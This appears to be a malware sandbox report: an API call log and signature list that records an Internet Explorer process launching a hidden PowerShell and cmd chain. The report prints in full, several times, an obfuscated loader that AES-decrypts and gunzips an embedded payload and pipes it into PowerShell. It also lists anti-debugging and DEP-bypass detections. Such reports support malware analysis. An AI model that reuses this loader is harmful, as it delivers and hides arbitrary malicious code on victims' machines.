System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2932
thread_handle: 0x00000000000004dc
process_identifier: 2928
current_directory: C:\Users\test22\Desktop
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004d4
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
filepath: powershell.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -
filepath: C:\Windows\System32\cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2612 CREDAT:145409
host 117.18.232.200
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
parent_process iexplore.exe martian_process powershell.exe -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell - }
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] $BvKJEQU = $TygiA.ToArray();$CiCNoyk = [System.Text.Encoding]::UTF8.GetString($BvKJEQU);$CiCNoyk | powershell -
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c powershell.exe $aLsftDKY = 'AAAAAAAAAAAAAAAAAAAAAO4m7YWwIHSB5hZ6WH96f5FuL5U5uPFq7F8RGzGOOjPAZSm80tg7wEfIXYu5+lz5PyJ50DD3hxut/1MS/sxU8ZFsWcl0JNohszi8GgF4AwgWiHMg9Z/ibGHWagLGXxVnyuifkF+t/GIGPNsyr3rBCR/3XKCA9Rg9h3WK3Vu65F6QlJSg+ClYEl6mqsq/bQ8CxLYxK+xGbuhbJdKTDOytmzLkaZhokqPJsb0k4JwWqdann7AudNujeQJnF9JDHa4/6CuiQxXz4SvTL0mC2y1o/5xINhK3yoo6rMfshcfXGYdt/nfHTivyuvmjhQbBdigORs7P0coe4LPTzar7K/BCtIqerfEHRhzXMIN69EMmif9lQabSbGGaLk0NYLWcLT8vVCQDjNDz1FtMvRpOq1tP9MRPfBWfLo3q/zpm4E6au3yQqtlsfut1HTOActYuAa6UWBjNiweyXj3LQKcCTqf08jdJay1uv7oE+iHkmE+HHDwggvTAr6HjX9vT34KcKqm8UaVvV6by+j/vLomjKmVjXBzCmChwebc8Ti0sD+dz/WCV48KophgbtVKxnYfMGyJzQNnN5IMAs7t+W+IzHJIDcNCcOL+D8vZis3fIT8O6tJ19uXYo0fPulv5MsTZxn2C8O3r0eCKq5GkLuQEEEcLxjJi3czl2hElXaTmkNEZXxTSb1RfcU/EZ/LZZJbhHvo6JLoFTeXy6GqpMmdYiWx5ZzkZZWxyCF0JaXNvTxLZ/QF/b2JK1J4e/NvSW6hiVBYoS9YfhEyqeyaw8twsK2Laj+PGjlSc7EUHYHJznQsn9lrfayYdKXbdaLKL2prn67k7wg1Ep3m+sK03XVkg8hbJrZveAlyfxL4Lq+7ne5hoL9m7Zayr9FVklJj7q4M8DBvTI2X3Ab9/3vM0hXM7Vmo+LP9py7CQx+kQ5tyPQDFc0JAsgFpUFgM0mnLl1+cFWQxaNUdtqiYi1YCsAjzgBuuuTnqd0OjnmyRDFKCpQYLZ14jjY1Tjhl6yWfIOuhw0kA9op5dUyQgLGY0kXmwkXmWaeO73vAMMSgU28ElxCh6MbbPDGNFRjoSOJ6HPqZIFBLKv9mw==';$rhrxHack = 'THVRU0tZSG9UZ0dOWEFTU25zdmtBRE5XelhWQWJ0R3Y=';$agjCKS = New-Object 'System.Security.Cryptography.AesManaged';$agjCKS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$agjCKS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$agjCKS.BlockSize = 128;$agjCKS.KeySize = 256;$agjCKS.Key = [System.Convert]::FromBase64String($rhrxHack);$OtXkk = [System.Convert]::FromBase64String($aLsftDKY);$zPgIkFFt = $OtXkk[0..15];$agjCKS.IV = $zPgIkFFt;$AJxGfSbWQ = $agjCKS.CreateDecryptor();$PAcQmaiYr = $AJxGfSbWQ.TransformFinalBlock($OtXkk, 16, $OtXkk.Length - 16);$agjCKS.Dispose();$cykSE = New-Object System.IO.MemoryStream( , $PAcQmaiYr );$TygiA = New-Object System.IO.MemoryStream;$HynMnhZHL = New-Object System.IO.Compression.GzipStream $cykSE, ([IO.Compression.CompressionMode]::Decompress);$HynMnhZHL.CopyTo( $TygiA );$HynMnhZHL.Close();$cykSE.Close();[byte[]] 